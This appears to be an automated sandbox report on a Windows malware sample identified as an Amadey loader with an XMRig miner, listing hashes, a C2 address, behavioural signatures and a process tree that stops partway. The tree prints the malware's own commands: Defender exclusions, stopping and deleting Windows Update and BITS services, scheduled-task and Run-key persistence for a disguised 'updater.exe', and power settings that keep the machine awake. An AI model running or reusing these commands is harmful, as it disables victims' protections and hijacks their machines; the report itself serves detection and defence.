Analysis
-
max time kernel
300s -
max time network
297s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
15-07-2023 04:47
Static task
static1
Behavioral task
behavioral1
Sample
0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe
Resource
win10-20230703-en
General
-
Target
0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe
-
Size
5.3MB
-
MD5
5247f286b68bc92d3035e205c669ba43
-
SHA1
a2300146f6545e570f5e0b290c59a60aed8d00b7
-
SHA256
0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620
-
SHA512
bf312c2603ca5445ccfc1820920101a92b92e109f65a2e87623feb567e805674ca632c0464870efab4974bc0464e8a0cc41e24acab6f555310cb282d2feba2a3
-
SSDEEP
98304:5RQP+mv3dnIJUp+EQkeScktlsJMDIpnFSFJeQ6J95tCn7fv:Hevt+5EZikLs6IBFK6J95o7fv
Malware Config
Extracted
amadey
3.83
5.42.65.80/8bmeVwqx/index.php
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 2928 created 1284 2928 XandETC.exe 12 PID 2928 created 1284 2928 XandETC.exe 12 PID 2928 created 1284 2928 XandETC.exe 12 PID 2928 created 1284 2928 XandETC.exe 12 PID 2928 created 1284 2928 XandETC.exe 12 PID 2444 created 1284 2444 updater.exe 12 PID 2444 created 1284 2444 updater.exe 12 PID 2444 created 1284 2444 updater.exe 12 PID 2444 created 1284 2444 updater.exe 12 PID 2444 created 1284 2444 updater.exe 12 PID 2788 created 1284 2788 conhost.exe 12 PID 2444 created 1284 2444 updater.exe 12 PID 2444 created 1284 2444 updater.exe 12 -
XMRig Miner payload 20 IoCs
resource yara_rule behavioral1/memory/2412-166-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-167-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-171-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-173-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-175-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-177-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-179-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-182-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-184-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-186-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-188-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-190-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-192-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-195-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-197-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-199-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-201-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-203-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-205-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2412-208-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 10 IoCs
pid Process 1060 aafg31.exe 2412 oldplayer.exe 2928 XandETC.exe 2956 oneetx.exe 2044 oneetx.exe 2444 updater.exe 2752 oneetx.exe 932 oneetx.exe 2596 oneetx.exe 1292 oneetx.exe -
Loads dropped DLL 5 IoCs
pid Process 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 2412 oldplayer.exe 1808 taskeng.exe -
resource yara_rule behavioral1/memory/2412-159-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-166-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-167-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-171-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-173-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-175-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-177-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-179-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-182-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-184-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-186-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-188-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-190-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-192-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-195-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-197-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-199-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-201-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-203-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-205-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2412-208-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2444 set thread context of 2788 2444 updater.exe 101 PID 2444 set thread context of 2412 2444 updater.exe 106 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1552 sc.exe 2244 sc.exe 1404 sc.exe 884 sc.exe 1996 sc.exe 2576 sc.exe 1068 sc.exe 2304 sc.exe 1636 sc.exe 2876 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 860 schtasks.exe 468 schtasks.exe 1720 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2240 WMIC.exe -
Modifies data under HKEY_USERS 7 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 002fd5a5d7b6d901 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates conhost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2928 XandETC.exe 2928 XandETC.exe 2532 powershell.exe 2928 XandETC.exe 2928 XandETC.exe 2928 XandETC.exe 2928 XandETC.exe 2928 XandETC.exe 2928 XandETC.exe 1872 powershell.exe 2928 XandETC.exe 2928 XandETC.exe 300 powershell.exe 2444 updater.exe 2444 updater.exe 1896 powershell.exe 2444 updater.exe 2444 updater.exe 2444 updater.exe 2444 updater.exe 2444 updater.exe 2444 updater.exe 2572 powershell.exe 2444 updater.exe 2444 updater.exe 2788 conhost.exe 2788 conhost.exe 2444 updater.exe 2444 updater.exe 2444 updater.exe 2444 updater.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe 2412 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 472 Process not Found -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeDebugPrivilege 2532 powershell.exe Token: SeShutdownPrivilege 1944 powercfg.exe Token: SeShutdownPrivilege 1076 powercfg.exe Token: SeShutdownPrivilege 2352 powercfg.exe Token: SeDebugPrivilege 1872 powershell.exe Token: SeShutdownPrivilege 2336 powercfg.exe Token: SeDebugPrivilege 300 powershell.exe Token: SeDebugPrivilege 1896 powershell.exe Token: SeShutdownPrivilege 2184 powercfg.exe Token: SeShutdownPrivilege 2456 powercfg.exe Token: SeDebugPrivilege 2572 powershell.exe Token: SeShutdownPrivilege 1468 powercfg.exe Token: SeShutdownPrivilege 2024 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 2240 WMIC.exe Token: SeIncreaseQuotaPrivilege 2240 WMIC.exe Token: SeSecurityPrivilege 2240 WMIC.exe Token: SeTakeOwnershipPrivilege 2240 WMIC.exe Token: SeLoadDriverPrivilege 2240 WMIC.exe Token: SeSystemtimePrivilege 2240 WMIC.exe Token: SeBackupPrivilege 2240 WMIC.exe Token: SeRestorePrivilege 2240 WMIC.exe Token: SeShutdownPrivilege 2240 WMIC.exe Token: SeSystemEnvironmentPrivilege 2240 WMIC.exe Token: SeUndockPrivilege 2240 WMIC.exe Token: SeManageVolumePrivilege 2240 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2240 WMIC.exe Token: SeIncreaseQuotaPrivilege 2240 WMIC.exe Token: SeSecurityPrivilege 2240 WMIC.exe Token: SeTakeOwnershipPrivilege 2240 WMIC.exe Token: SeLoadDriverPrivilege 2240 WMIC.exe Token: SeSystemtimePrivilege 2240 WMIC.exe Token: SeBackupPrivilege 2240 WMIC.exe Token: SeRestorePrivilege 2240 WMIC.exe Token: SeShutdownPrivilege 2240 WMIC.exe Token: SeSystemEnvironmentPrivilege 2240 WMIC.exe Token: SeUndockPrivilege 2240 WMIC.exe Token: SeManageVolumePrivilege 2240 WMIC.exe Token: SeLockMemoryPrivilege 2412 conhost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2412 oldplayer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2776 wrote to memory of 1060 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 28 PID 2776 wrote to memory of 1060 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 28 PID 2776 wrote to memory of 1060 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 28 PID 2776 wrote to memory of 1060 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 28 PID 2776 wrote to memory of 2412 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 29 PID 2776 wrote to memory of 2412 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 29 PID 2776 wrote to memory of 2412 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 29 PID 2776 wrote to memory of 2412 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 29 PID 2776 wrote to memory of 2928 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 30 PID 2776 wrote to memory of 2928 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 30 PID 2776 wrote to memory of 2928 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 30 PID 2776 wrote to memory of 2928 2776 0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe 30 PID 2412 wrote to memory of 2956 2412 oldplayer.exe 31 PID 2412 wrote to memory of 2956 2412 oldplayer.exe 31 PID 2412 wrote to memory of 2956 2412 oldplayer.exe 31 PID 2412 wrote to memory of 2956 2412 oldplayer.exe 31 PID 2956 wrote to memory of 860 2956 oneetx.exe 32 PID 2956 wrote to memory of 860 2956 oneetx.exe 32 PID 2956 wrote to memory of 860 2956 oneetx.exe 32 PID 2956 wrote to memory of 860 2956 oneetx.exe 32 PID 2956 wrote to memory of 2744 2956 oneetx.exe 34 PID 2956 wrote to memory of 2744 2956 oneetx.exe 34 PID 2956 wrote to memory of 2744 2956 oneetx.exe 34 PID 2956 wrote to memory of 2744 2956 oneetx.exe 34 PID 2744 wrote to memory of 2708 2744 cmd.exe 36 PID 2744 wrote to memory of 2708 2744 cmd.exe 36 PID 2744 wrote to memory of 2708 2744 cmd.exe 36 PID 2744 wrote to memory of 2708 2744 cmd.exe 36 PID 2744 wrote to memory of 2716 2744 cmd.exe 37 PID 2744 wrote to memory of 2716 2744 cmd.exe 37 PID 2744 wrote to memory of 2716 2744 cmd.exe 37 PID 2744 wrote to memory of 2716 2744 cmd.exe 37 PID 2744 wrote to memory of 2760 2744 cmd.exe 38 PID 2744 wrote to memory of 2760 2744 cmd.exe 38 PID 2744 wrote to memory of 2760 2744 cmd.exe 38 PID 2744 wrote to memory of 2760 2744 cmd.exe 38 PID 2744 wrote to memory of 2816 2744 cmd.exe 39 PID 2744 wrote to memory of 2816 2744 cmd.exe 39 PID 2744 wrote to memory of 2816 2744 cmd.exe 39 PID 2744 wrote to memory of 2816 2744 cmd.exe 39 PID 2744 wrote to memory of 2160 2744 cmd.exe 40 PID 2744 wrote to memory of 2160 2744 cmd.exe 40 PID 2744 wrote to memory of 2160 2744 cmd.exe 40 PID 2744 wrote to memory of 2160 2744 cmd.exe 40 PID 2744 wrote to memory of 2188 2744 cmd.exe 41 PID 2744 wrote to memory of 2188 2744 cmd.exe 41 PID 2744 wrote to memory of 2188 2744 cmd.exe 41 PID 2744 wrote to memory of 2188 2744 cmd.exe 41 PID 1992 wrote to memory of 2044 1992 taskeng.exe 49 PID 1992 wrote to memory of 2044 1992 taskeng.exe 49 PID 1992 wrote to memory of 2044 1992 taskeng.exe 49 PID 1992 wrote to memory of 2044 1992 taskeng.exe 49 PID 2600 wrote to memory of 1944 2600 cmd.exe 56 PID 2600 wrote to memory of 1944 2600 cmd.exe 56 PID 2600 wrote to memory of 1944 2600 cmd.exe 56 PID 1976 wrote to memory of 1068 1976 cmd.exe 57 PID 1976 wrote to memory of 1068 1976 cmd.exe 57 PID 1976 wrote to memory of 1068 1976 cmd.exe 57 PID 2600 wrote to memory of 1076 2600 cmd.exe 58 PID 2600 wrote to memory of 1076 2600 cmd.exe 58 PID 2600 wrote to memory of 1076 2600 cmd.exe 58 PID 2600 wrote to memory of 2352 2600 cmd.exe 59 PID 2600 wrote to memory of 2352 2600 cmd.exe 59 PID 2600 wrote to memory of 2352 2600 cmd.exe 59 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe"C:\Users\Admin\AppData\Local\Temp\0be27abe7b8402580c8ee84dc58a64b2bc9077e2d32634675fb723de04646620.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\aafg31.exe"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"3⤵
- Executes dropped EXE
PID:1060
-
-
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F5⤵
- Creates scheduled task(s)
PID:860
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit5⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:2708
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:N"6⤵PID:2716
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:R" /E6⤵PID:2760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:2816
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:N"6⤵PID:2160
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:R" /E6⤵PID:2188
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2928
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1068
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2304
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1636
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2876
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1552
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:2364
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:3020
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:568
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1704
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:2064
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:468
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:300 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵PID:1920
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:2084
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2244
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1404
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:884
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1996
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2576
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1616
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1188
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:1248
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2844
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1712
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:1612
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572 -
